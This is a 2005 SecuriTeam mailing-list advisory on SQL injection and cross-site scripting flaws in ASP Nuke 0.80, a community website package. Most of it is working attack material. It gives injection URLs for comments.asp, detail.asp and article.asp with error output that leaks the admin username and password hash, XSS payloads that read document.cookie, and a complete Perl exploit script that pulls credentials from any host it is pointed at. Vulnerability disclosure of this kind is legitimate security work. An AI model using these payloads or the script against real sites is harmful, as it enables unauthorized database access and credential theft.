[NT] ASP Nuke Multiple SQL Injection and XSS Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 04/25/05

  • Next message: SecuriTeam: "[NEWS] Yawcam Directory Traversal" 
    To: list@securiteam.com
Date: 25 Apr 2005 15:11:31 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      ASP Nuke Multiple SQL Injection and XSS Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.aspnuke.com/> ASP Nuke is "an open-source software
    application for running a community-based web site on a web server".

    The lack of parameter filtering allows attackers to steal information and
    modify/add/delete or just view information from ASP Nuke's database.

    DETAILS

    Vulnerable Systems:
     * ASP Nuke version 0.80

    SQL Injection:
    ASP Nuke has many pages that are vulnerable to SQL Injections.

    Example #1:
    The following URL can be used to trigger an SQL injection vulnerability in
    the comments.asp page:
    http://localhost/module/support/task/comments.asp?taskid='SQL_INJECTION
    SQL INJECTION

    Error # -2147217900 (0x80040E14)
    Unclosed quotation mark before the character string 'SQL_INJECTION AND
    tsk.Active <> 0 AND tsk.Archive = 0'.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
    usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
    CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
    tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
    tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
    WHERE tsk.TaskID = 'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0

    Exploit:
    To the get the username:
    http://localhost/module/support/task/comments.asp?taskid=Username--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value 'admin' to a column of data type
    int.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
    usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
    CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
    tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
    tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
    WHERE tsk.TaskID = Username-- AND tsk.Active <> 0 AND tsk.Archive = 0

    With "admin" being the username

    To the get the password:
    http://localhost/module/support/task/comments.asp?taskid=Password--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value
    'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
    column of data type int.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
    usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
    CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
    tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
    tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
    WHERE tsk.TaskID = Password-- AND tsk.Active <> 0 AND tsk.Archive = 0

    With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
    being the password hash encrypted in SHA 256

    Example #2:
    The following URL can be used to trigger an SQL injection vulnerability in
    the detail.asp page:
    http://localhost/module/support/task/detail.asp?taskid='SQL_INJECTION
    SQL INJECTION

    Error # -2147217900 (0x80040E14)
    Unclosed quotation mark before the character string 'SQL_INJECTION AND
    tsk.Active <> 0 AND tsk.Archive = 0'.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
    pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
    tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
    tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
    tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
    'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0

    Exploit:
    To the get the username:
    http://localhost/module/support/task/detail.asp?taskid=Username--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value 'admin' to a column of data type
    int.
    SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
    pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
    tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
    tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
    tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
    Username-- AND tsk.Active <> 0 AND tsk.Archive = 0

    With "admin" being the username

    To the get the password:
    http://localhost/module/support/task/detail.asp?taskid=Password--

    This would result in:
    Error # -2147217913 (0x80040E07)
    Syntax error converting the varchar value
    'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
    column of data type int.

    SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
    pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
    tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
    tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
    tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
    Password-- AND tsk.Active <> 0 AND tsk.Archive = 0

    With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
    being the password hash encrypted in SHA 256

    Example #3:
    The following URL can be used to trigger an SQL injection vulnerability in
    the article.asp page:
    http://localhost/module/article/article/article.asp?articleid='SQL_INJECTION
    SQL INJECTION

    Error # -2147217900 (0x80040E14)
    Unclosed quotation mark before the character string 'SQL_INJECTION AND
    art.Active <> 0 AND art.Archive = 0'.
    SELECT art.ArticleID, art.Title, art.ArticleBody, auth.FirstName,
    auth.LastName, cat.CategoryName, art.CommentCount, art.Created FROM
    tblArticle art INNER JOIN tblArticleAuthor auth ON art.AuthorID =
    auth.AuthorID INNER JOIN tblArticleToCategory atc ON atc.ArticleID =
    art.ArticleID INNER JOIN tblArticleCategory cat ON atc.CategoryID =
    cat.CategoryID WHERE art.ArticleID = 'SQL_INJECTION AND art.Active <> 0
    AND art.Archive = 0

    Cross Site Scripting:
    The following URL can be used to trigger the cross site scripting
    vulnerability found in the profile.asp page:
    http://localhost/module/discuss/forum/profile.asp?topicid=1&
    thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://localhost/module/support/language/select.asp?
    code='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    Exploit (Username and Password retrieval):
    #!/usr/bin/perl

    use IO::Socket;
    use Getopt::Std;
    print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";
    print "[x]By Diabolic Crab\n";
    print "[x]http://www.digitalparadox.org\n\n";

    getopt("h:p:");

    $opt_p ||= 80;

    if(!$opt_h) {
        die("[x] Usage: $0 -h <host> [-p <port>]\n");
    }

    $sqlpass = "/module/support/task/comments.asp?taskid=Password--
    HTTP/1.0\n";
    $sqllogin = "/module/support/task/comments.asp?taskid=Username--
    HTTP/1.0\n";

    print "[x] Host: $opt_h\n";
    print "[x] Port: $opt_p\n";

    $Q1 = "GET $sqllogin";
    $Q1 .= "Host: ".$opt_h."\n\n";

    $Q2 = "GET $sqlpass";
    $Q2 .= "Host: ".$opt_h."\n\n";

    $s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort =>
    $opt_p) or die("Can't connect!");
    $s->send($Q1);
    $s->recv($usr, 1024);

    $s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort =>
    $opt_p) or die("Can't connect!");
    $s->send($Q2);
    $s->recv($pass, 1024);

    $s = index($usr,"'");
    $e = index($usr,"'", $s + 1);
    $f = $e - $s - 1;
    print "[x]Username in SHA 256 is: ";
    print substr($usr, $s + 1, $f);
    print "\n";

    $s = index($pass,"'");
    $e = index($pass,"'", $s + 1);
    $f = $e - $s - 1;
    print "[x]Password hash in SHA 256 is: ";
    print substr($pass, $s + 1, $f);
    print "\n";

    #EOF

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dcrab@hackerscenter.com>
    Diabolic Crab.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Yawcam Directory Traversal"